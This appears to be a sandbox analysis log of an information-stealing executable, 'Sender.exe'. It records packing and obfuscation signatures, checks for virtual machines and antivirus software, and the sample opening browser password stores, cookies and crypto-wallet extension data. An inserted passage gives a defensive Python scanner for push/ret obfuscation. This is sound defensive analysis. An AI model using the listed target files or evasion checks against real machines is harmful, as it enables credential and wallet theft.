Source: C:\Users\user\Desktop\Sender.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Sender.exe | Section loaded: version.dll
Source: Sender.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Sender.exe | Static PE information: section name: UPX2
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_006CF60C push BEC42319h; ret 0_3_006CF623
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_006EC260 pushad ; retn 006Eh 0_3_006EC261
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_006EC254 push eax; retn 006Eh 0_3_006EC255
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_006EC250 push eax; retn 006Eh 0_3_006EC251
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_006ECEE5 push 5D006F00h; retn 006Bh 0_3_006ECF09
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_00685EC0 pushfd ; ret 0_3_006866E1
Source: C:\Users\user\Desktop\Sender.exe | Code function: 0_3_0067BFE8 pushad ; retf 0_3_0067C025
Source: initial sample | Static PE information: section name: UPX0
Source: initial sample | Static PE information: section name: UPX1
Source: C:\Users\user\Desktop\Sender.exe | Process information set: NOOPENFILEERRORBOX
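The "push BEC42319h; ret", "push eax; retn 006Eh" and "pushad ; retf" hits above are the shape that the "Uses code obfuscation techniques (call, push, ret)" signature keys on: a push-family instruction whose return-family partner turns the pushed value (or whatever is on the stack) into a return address, so a linear disassembler follows the wrong path. The scanner below is an added example, not code from the report or the sample, that finds that shape in raw 32-bit x86 bytes without a disassembler. The two confidence tiers, the 32-byte window for pushad/pushfd and the constructed test bytes are assumptions of this example; a hit is a lead to confirm in a real disassembly, not proof of packing.

```python
"""Byte-level heuristic for push/ret control-flow obfuscation in x86 code.
Added example; not from the report or the sample. Assumptions: 32-bit code, no
disassembler, confidence tiers and the 32-byte window are the author's choice."""
from dataclasses import dataclass
from typing import List, Optional, Tuple

PUSH_IMM32, PUSHAD, PUSHFD = 0x68, 0x60, 0x9C
PUSH_REG = {0x50 + i: r for i, r in enumerate(
    ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"])}
RET_NEAR, RETN_IMM16, RET_FAR, RETF_IMM16 = 0xC3, 0xC2, 0xCB, 0xCA


@dataclass(frozen=True)
class Hit:
    push_off: int     # offset of the push-family instruction
    ret_off: int      # offset of the matching return
    kind: str         # "push ...; ret..." text, sandbox-report style
    confidence: str   # "high": adjacent pair; "medium": pushad/pushfd with a ret in the window


def _push_at(code: bytes, i: int) -> Tuple[int, str]:
    """(length, text) if code[i] starts a push we care about, else (0, '')."""
    b = code[i]
    if b == PUSH_IMM32 and i + 5 <= len(code):
        return 5, "push %08Xh" % int.from_bytes(code[i + 1:i + 5], "little")
    if b in PUSH_REG:
        return 1, "push " + PUSH_REG[b]
    if b == PUSHAD:
        return 1, "pushad"
    if b == PUSHFD:
        return 1, "pushfd"
    return 0, ""


def _ret_at(code: bytes, i: int) -> Optional[str]:
    """Text of a return-family instruction starting at code[i], or None."""
    b = code[i]
    if b == RET_NEAR:
        return "ret"
    if b == RET_FAR:
        return "retf"
    if b in (RETN_IMM16, RETF_IMM16) and i + 3 <= len(code):
        imm = int.from_bytes(code[i + 1:i + 3], "little")
        return ("retn" if b == RETN_IMM16 else "retf") + " %04Xh" % imm
    return None


def find_push_ret(code: bytes, base: int = 0, window: int = 32) -> List[Hit]:
    # Rule A (high): push imm32 / push reg immediately followed by a return. Compilers
    # never emit this; it is an indirect jump through the stack.
    # Rule B (medium): pushad/pushfd with a return within `window` bytes. Both opcodes
    # are essentially absent from compiler output, so a loose pairing is still a lead.
    hits: List[Hit] = []
    i = 0
    while i < len(code):
        plen, ptext = _push_at(code, i)
        if plen == 0:
            i += 1
            continue
        nxt = i + plen
        if code[i] in (PUSHAD, PUSHFD):
            for j in range(nxt, min(len(code), nxt + window)):
                rtext = _ret_at(code, j)
                if rtext:
                    hits.append(Hit(base + i, base + j, f"{ptext}; {rtext}", "medium"))
                    break
        elif nxt < len(code):
            rtext = _ret_at(code, nxt)
            if rtext:
                hits.append(Hit(base + i, base + nxt, f"{ptext}; {rtext}", "high"))
        i += 1   # step one byte, not plen: the scan is deliberately alignment-agnostic
    return hits


def hits_per_kib(code: bytes, hits: List[Hit]) -> float:
    """Hit density; packed or obfuscated regions stand out against compiler output."""
    return len(hits) * 1024 / max(len(code), 1)


# Constructed test bytes (not taken from the sample): one benign prologue/epilogue,
# then the obfuscation shapes the report lists.
SAMPLE_CODE = (
    b"\x55\x8B\xEC\x33\xC0\x5D\xC3"       # push ebp; mov ebp,esp; xor eax,eax; pop ebp; ret (benign)
    + b"\x68\x19\x23\xC4\xBE\xC3"         # push BEC42319h; ret
    + b"\x90\x90"
    + b"\x60\x90\x90\x90\xC2\x6E\x00"     # pushad; nop; nop; nop; retn 006Eh
    + b"\x50\xC2\x6E\x00"                 # push eax; retn 006Eh
    + b"\x9C\x90\xC3"                     # pushfd; nop; ret
    + b"\x60\xCB"                         # pushad; retf
)

if __name__ == "__main__":
    for h in find_push_ret(SAMPLE_CODE, base=0x400000):
        print(f"{h.push_off:08X} -> {h.ret_off:08X}  {h.kind}  [{h.confidence}]")
```

The benign prologue produces no hit because Rule A requires the return to follow the push directly; a normal `push ebp ... pop ebp; ret` function is therefore not flagged, which is the property that keeps the density figure meaningful when the scanner is run over a whole UPX0/UPX1 section dump.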

      Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Sender.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\Sender.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\Sender.exe TID: 5828 | Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Desktop\Sender.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: Sender.exe, Sender.exe, 00000000.00000003.1172667613.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1291043267.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290555834.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291724046.000000000063A000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1232012397.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291853008.0000000000685000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Sender.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Sender.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Sender.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Sender.exe, Sender.exe, 00000000.00000003.1290555834.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.000000000066B000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278664144.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291970435.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244133244.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000002.1291751130.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1244329854.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1290417095.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1291117129.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1278704674.0000000000657000.00000004.00000020.00020000.00000000.sdmp, Sender.exe, 00000000.00000003.1251834541.00000000006E7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\Sender.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

      Stealing of Sensitive Information

Source: Yara match | File source: 0.2.Sender.exe.a00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1292268043.0000000000A01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpa
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\Sender.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
